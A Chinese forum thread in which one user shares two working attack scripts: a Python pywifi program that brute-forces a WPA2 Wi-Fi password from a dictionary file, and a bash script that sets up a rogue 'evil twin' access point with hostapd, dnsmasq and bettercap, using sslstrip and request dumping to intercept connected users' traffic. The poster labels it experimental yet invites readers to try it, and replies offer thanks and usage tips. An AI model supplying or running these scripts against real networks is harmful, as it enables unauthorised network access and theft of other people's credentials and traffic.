使用密码字典 和 Python自带的pywifi模块去暴力**wifi
没啥好说的,一切都在代码中import pywifi
import time
from pywifi import const
def wifi_connnect(pwd):
wifi = pywifi.PyWiFi()
#拿到第一个
inter = wifi.interfaces()
#先断开连接!!!!不断就没得搞手,先断开,才可以连接其他的WIFI
inter.disconnect()
#休眠3秒
time.sleep(3)
#如果是没连接的状态下
if inter.status() == const.IFACE_DISCONNECTED:
#注意是大写Pro
f = pywifi.Profile()
#设置好想要蹂躏的id
f.ssid = "bdj"
#密码用字典
f.key = pwd
#网卡的开放
f.auth = const.AUTH_ALG_OPEN
#加密单元
f.cipher = const.CIPHER_TYPE_CCMP
#加密算法的类型
f.akm.append(const.AKM_TYPE_WPA2PSK)
#删除之前的wifi文件
inter.remove_all_network_profiles()
#设置新的连接文件
temp_p = inter.add_network_profile(f)
#去连接它
inter.connect(temp_p)
time.sleep(3)
#连接成功直接return
if inter.status() == const.IFACE_CONNECTED:
return True
else:
return False
else:
print("connected")
def readtxt():
#这里填自己字典的绝对路径
path = "D:\填绝对路径"
#打开文件,设置为read模式
file = open(path, "r")
#死循环
while True:
#pwd 为读取到的每一行
pwd = file.readline()
# print(pwd)
#如果连接上了,wifi_connect会return True 那么直接break吊while循环
res = wifi_connnect(pwd)
if res:
print("password is correct", pwd)
break
else:
print("password is error", pwd)
#调用函数
readtxt()
在新标签打开所有链接复制所有链接URL复制所有链接URL(反向)复制所有链接标题 + URL复制所有链接标题 + URL (MD)复制所有链接标题 + URL (BBS)复制所有链接标题 + URL (筛选)复制所有链接标题 + URL (设置复制格式)在新标签页打开所有图片链接在一个标签页显示所有图片链接
复选框 - 选中
复选框 - 取消
复选框 - 反选
单选框 - 选中
单选框 - 取消
特殊单选框 - 选中 本帖最后由 mdf3192078 于 2021-6-3 19:27 编辑
#!/bin/bash
# Description: This script function is one click to create a Evil-AP and MITM it.
# Version: v0.1
echo PLEASE USE sudo apt-get install dnsmasq hostapd bettercap
MONITOR_DEVICE=wlan0
OUTPUT_DEVICE=eth0
cat <<EOF > dnsmasq.conf
log-facility=/var/log/dnsmasq.log
dhcp-range=192.168.5.1,192.168.5.250,12h
dhcp-option=3,192.168.5.1
dhcp-option=6,192.168.5.1
server=114.114.114.114
log-queries
log-dhcp
EOF
cat <<EOF > hostapd.conf
driver=nl80211
ssid=test
hw_mode=g
channel=6
logger_syslog=-1
logger_syslog_level=2
EOF
cat <<EOF > net-sniffer.cap
set gateway.address 192.168.5.1
net.probe on
set http.proxy.sslstrip true
set https.proxy.sslstrip true
set http.proxy.script http-req-dump.js
set https.proxy.script http-req-dump.js
net.sniff on
http.proxy on
https.proxy on
EOF
# Catch ctrl c so we can exit cleanly
trap ctrl_c INT
function ctrl_c(){
echo Killing processes...
killall dnsmasq
killall hostapd
}
ifconfig $MONITOR_DEVICE 192.168.5.1/24 up
dnsmasq -C dnsmasq.conf -i $MONITOR_DEVICE
sysctl -w net.ipv4.ip_forward=1
iptables -P FORWARD ACCEPT
iptables --table nat -A POSTROUTING -o $OUTPUT_DEVICE -j MASQUERADE
hostapd ./hostapd.conf -i $MONITOR_DEVICE -B
cp /usr/share/bettercap/caplets/http-req-dump/http-req-dump.js .
bettercap -iface $MONITOR_DEVICE -caplet net-sniffer.cap
echo Killing processes...
killall dnsmasq hostapd
rm -rf hostapd.conf dnsmasq.conf http-req-dump.js net-sniffer.cap
给一份钓鱼wifi脚本,大家可以试试。这个脚本只能是实验,不能实战!目前在kali linux 2020.3及以上版本测试无问题。
总之证书双向认证是过不了的。https窃听有很大的提示,所以只能实验实验。 本帖最后由 mdf3192078 于 2021-6-1 18:14 编辑
三个问题
1,速度特别慢!这个是肯定的的,不如抓包后跑包来的快,但对于无连接的wifi只能这样子跑了。
2,对于隐藏的SSID无法进行正确破解,即使密码正确也会报password is error
3,密码字典如果是手工输入的,最后一行没有标识符的话会一直读取空行。
密码字典的绝对路径最好有双斜杠\\以免产生歧义 感谢分享 学习学习 路过,学习啦!点赞! 嘟WiFi已关闭 确实看不懂,研究了半天 手说:我会了。眼睛:不会{:1_925:} 厉害了,以前都是在linux抓包跑字典才行的 mdf3192078 发表于 2021-6-1 18:13
三个问题
1,速度特别慢!这个是肯定的的,不如抓包后跑包来的快,但对于无连接的wifi只能这样子跑了。
2 ...
收到,学习到了。